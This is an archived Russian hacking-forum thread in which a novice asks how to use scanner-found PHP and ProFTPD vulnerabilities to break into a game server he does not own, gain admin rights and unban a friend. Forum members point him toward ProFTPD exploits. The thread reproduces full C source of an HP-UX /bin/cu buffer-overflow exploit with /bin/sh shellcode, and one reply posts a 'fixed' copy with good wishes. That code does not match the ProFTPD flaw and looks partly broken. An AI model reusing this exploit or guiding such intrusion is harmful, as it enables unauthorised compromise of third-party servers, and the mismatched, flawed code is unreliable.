Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

как воспользоваться найденной уязвимостью

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Для начинающих] >> как воспользоваться найденной уязвимостью
Имя
Сообщение << Старые топики   Новые топики >>
как воспользоваться найденной уязвимостью - 2008-12-22 12:15:35.280000   
Amony

Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
Всем привет, я играю в онлайн игру на халявном серве, моего кента там перепутали с другим и забанили решить вопрос с админом нереально, т.к. заходит он редко и стоны типа "не виноватая я" не слушает. Я решил ломануть сервачек, заручиться админскими правами, разбанить кента… и все будут счастливы. Проблема в том, что я лааамер. Вобщем протестил серв Shadow Security сканером, он выдал следующие уязвимости:

1
PHP is prone to a 'safe_mode' and 'open_basedir' restriction-bypass vulnerability. Successful exploits could allow an attacker to access sensitive information or to write files in unauthorized locations.This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP sсriрt code; in such cases, the 'safe_mode' and 'open_basedir' restrictions are expected to isolate users from each other.PHP version 5.2.0 is vulnerable to this issue.

2
ProFTPD is prone to a local stack buffer-overflow vulnerability.Attackers may exploit this issue to corrupt memory and execute arbitrary code in the context of the server application, resulting in a complete compromise of affected computers.ProFTPD is only vulnerable when compiled with 'mod_ctrls' support and the module is enabled.

3
ProFTPD is prone to a remote buffer-overflow vulnerability.Exploiting this issue allows remote attackers to cause a buffer overflow, to corrupt memory, and to execute arbitrary machine code in the context of the server application, facilitating the compromise of affected computers.ProFTPD 1.3.0a and prior versions are vulnerable to this issue.

4
ProFTPD is prone to a remote buffer-overflow vulnerability.Exploiting this issue allows remote attackers to cause a buffer overflow, to corrupt memory, and to execute arbitrary machine code in the context of the server application, facilitating the compromise of affected computers.ProFTPD 1.3.0a and prior versions are vulnerable to this issue.

Могу ли я со своими 0,001 способностями воспользоваться? И если да,то как? (Если вопрос по вашему мнению действительно тупой, скажите … без обид закроем тему8|)
Post #: 1
RE: как воспользоваться найденной уязвимостью - 2008-12-22 13:04:16.796666   
13thApostol

Сообщений: 134
Оценки: 0
Присоединился: 2008-11-03 23:41:57.986666
Ну если не обидешся))))):D
 
 
ТЕМУ ЗАКРЫТЬ АВТОРА В БАН!!!!!!!!:@
Post #: 2
RE: как воспользоваться найденной уязвимостью - 2008-12-22 13:11:20.593333   
Cep}|{

Сообщений: 1396
Оценки: 0
Присоединился: 2007-06-26 01:11:51.416666
quote:

ORIGINAL: 13thApostol

Ну если не обидешся))))):D


ТЕМУ ЗАКРЫТЬ АВТОРА В БАН!!!!!!!!:@
C какого …..
Post #: 3
RE: как воспользоваться найденной уязвимостью - 2008-12-22 13:16:56.670000   
13thApostol

Сообщений: 134
Оценки: 0
Присоединился: 2008-11-03 23:41:57.986666
 та прикол)[:(]
Post #: 4
RE: как воспользоваться найденной уязвимостью - 2008-12-22 13:23:21.360000   
Cep}|{

Сообщений: 1396
Оценки: 0
Присоединился: 2007-06-26 01:11:51.416666
quote:

ORIGINAL: 13thApostol

&nbsp;та прикол)[:(]
ну тада другой базар…
Post #: 5
RE: как воспользоваться найденной уязвимостью - 2008-12-22 14:58:26.830000   
Amony

Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
Прикол принят:D жду рекомендаций, или на худой конец еще приколов[&:]
Post #: 6
RE: как воспользоваться найденной уязвимостью - 2008-12-22 15:08:20.406666   
Amony

Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
Щас разбираю Уроки от Xakep9009, но я так понял времени это займет немало, а пацану играть хочется и аккаунта жалко - качал долго и с душой.
Post #: 7
RE: как воспользоваться найденной уязвимостью - 2008-12-22 15:47:16.500000   
Denisska05

Сообщений: 661
Оценки: 0
Присоединился: 2007-06-26 20:21:10.883333
Так пробовал ? _http://www.google.ru/search?hl=ru&newwindow=1&q=ProFTPD+exploit&lr=&aq=f&oq=
Post #: 8
RE: как воспользоваться найденной уязвимостью - 2008-12-23 01:20:44.260000   
Amony

Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
Ооо,что то существенное :). Спасибо.
Вобщем по твоей ссылке нашел я експлойт для уязвимости в ProFTPD, и … понял, что моих 0,0001 знаний наверное не хватит, т.к. что делать с кодом этого експлойта я не бум бум [:o]. Дааа и такие ламеры бывают:@. Или может у меня еще не все потеряно?[:-]
Post #: 9
RE: как воспользоваться найденной уязвимостью - 2008-12-23 01:23:05.743333   
Denisska05

Сообщений: 661
Оценки: 0
Присоединился: 2007-06-26 20:21:10.883333
Подозреваю что если код исходный то его нужно компелировать… если интерпретируемый то интерпретировать…
Post #: 10
RE: как воспользоваться найденной уязвимостью - 2008-12-23 01:25:35.760000   
Amony

Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
Да, чуть не забыл, Denisska05, кроме спасибо тебе + в репу, мож оно и не важно, но хоцца отблагодарить за содействие:).
Post #: 11
RE: как воспользоваться найденной уязвимостью - 2008-12-23 01:41:57.836666   
Amony

Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
/* Copyright © 2001 Zorgon
* All Rights Reserved
* The copyright notice above does not evidence any
* actual or intended publication of such source code.
*
* HP-UX /bin/cu exploit.
* Tested on HP-UX 11.00
* zorgon@antionline.org (http://www.nightbird.free.fr)
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#define LEN 9778
#define HPPA_NOP 0x0b390280
#define RET 0x7f7eb010
#define OFFSET 1200 /* it works for me */
u_char hppa_shellcode[] = /* K2 <ktwo@ktwo.ca> shellcode */
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";
int
main(int argc , char **argv){
char buffer[LEN+8];
int i;
long retaddr = RET;
int offset = OFFSET;

if(argc>1) offset = atoi(argv[1]);
for (i=0;i<LEN;i+=4)
*(long *)&buffer = retaddr + offset;
for (i=0;i&lt;(LEN-strlen(hppa_shellcode)-50);i++)
*(buffer+i) = HPPA_NOP;
memcpy(buffer+i,hppa_shellcode,strlen(hppa_shellcode));
fprintf(stderr, "HP-UX 11.00 /bin/cu exploit\n");
fprintf(stderr, "Copyright © 2001 Zorgon\n");
fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", retaddr + offset, offset, strlen(buffer));
execl("/bin/cu","cu","-l",buffer,0);
Post #: 12
RE: как воспользоваться найденной уязвимостью - 2008-12-23 01:43:38.430000   
Amony

Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
Я так понимаю это исходник, который нужно компилировать. Правильно?
Post #: 13
RE: как воспользоваться найденной уязвимостью - 2008-12-23 01:52:27.510000   
Amony

Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
Меня терзают смутные сомнения. Помоему это не с++. Да?
Post #: 14
RE: как воспользоваться найденной уязвимостью - 2008-12-23 02:32:50.913333   
Mamka

Сообщений: 560
Оценки: 0
Присоединился: 2007-11-26 22:20:09.313333

quote:

ORIGINAL: Amony

Меня терзают смутные сомнения. Помоему это не с++. Да?

Это ты почему так решил?
Post #: 15
RE: как воспользоваться найденной уязвимостью - 2008-12-23 02:59:54.243333   
KentOne

Сообщений: 178
Оценки: 0
Присоединился: 2008-07-15 16:30:46.030000
Судя по библиотекам С++
Post #: 16
RE: как воспользоваться найденной уязвимостью - 2008-12-23 17:31:45.650000   
v0l0d1ka

Сообщений: 36
Оценки: 0
Присоединился: 2008-12-22 00:24:04.290000
Языки программирования учить надо!
Post #: 17
RE: как воспользоваться найденной уязвимостью - 2008-12-24 00:56:27.150000   
Amony

Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
Та надо, полностью согласен. Но я тока начал учить, дошел до областей видимости. Может я конечно тугодум, но блин без консультанта, чисто по книгам сложно как то учится. По виду и мне показалось что с++, а в компилятор впихнул - он материться начал, вот я и засомневался. Я просто кроме с++, только бейсик в школе учил (до массивов дошел). Вот и подумал, что может другой какой то язык по терминам похожий на с++.
Дааа, ну я ламер.(нет наверное ламер - это круто для меня).
Post #: 18
RE: как воспользоваться найденной уязвимостью - 2008-12-24 01:06:19.600000   
Denisska05

Сообщений: 661
Оценки: 0
Присоединился: 2007-06-26 20:21:10.883333
Скорее всего это С++ но это явно не полный код проги…
Post #: 19
RE: как воспользоваться найденной уязвимостью - 2008-12-24 14:32:34.536666   
Amony

Сообщений: 18
Оценки: 0
Присоединился: 2007-04-27 12:00:56.890000
Оооо, будем кумекать, спасибо.
Post #: 20
RE: как воспользоваться найденной уязвимостью - 2008-12-27 20:21:20.016666   
v0l0d1ka

Сообщений: 36
Оценки: 0
Присоединился: 2008-12-22 00:24:04.290000
Вот тебе исправленный текст:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
#define LEN 9778
#define HPPA_NOP 0x0b390280
#define RET 0x7f7eb010
#define OFFSET 1200 /* it works for me */
char hppa_shellcode[] = /* K2 <ktwo@ktwo.ca> shellcode */
"\xe8\x3f\x1f\xfd\x08\x21\x02\x80\x34\x02\x01\x02\x08\x41\x04\x02\x60\x40"
"\x01\x62\xb4\x5a\x01\x54\x0b\x39\x02\x99\x0b\x18\x02\x98\x34\x16\x04\xbe"
"\x20\x20\x08\x01\xe4\x20\xe0\x08\x96\xd6\x05\x34\xde\xad\xca\xfe/bin/sh\xff";
int
main(int argc , char **argv){
char buffer[LEN+8];
int i;
long retaddr = RET;
int offset = OFFSET;

if(argc>1) offset = atoi(argv[1]);
for (i=0;i<LEN;i+=4)
*(long *)&buffer = retaddr + offset;
for (i=0;i<(LEN- strlen(hppa_shellcode)-50);i++)
*(buffer+i) = HPPA_NOP;
memcpy(buffer+i,hppa_shellcode,strlen(hppa_shellcode));
fprintf(stderr, "HP-UX 11.00 /bin/cu exploit\n");
fprintf(stderr, "Copyright © 2001 Zorgon\n");
fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]\n", retaddr + offset, offset, strlen(buffer));
execl("/bin/cu","cu","-l",buffer,0);
}

У меня все компилируется с помощью компилятора Dev-C++. Exe-шник проверяй на практике. Желаю удачи
Post #: 21
Страниц:  [1]
Все форумы >> [Для начинающих] >> как воспользоваться найденной уязвимостью







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.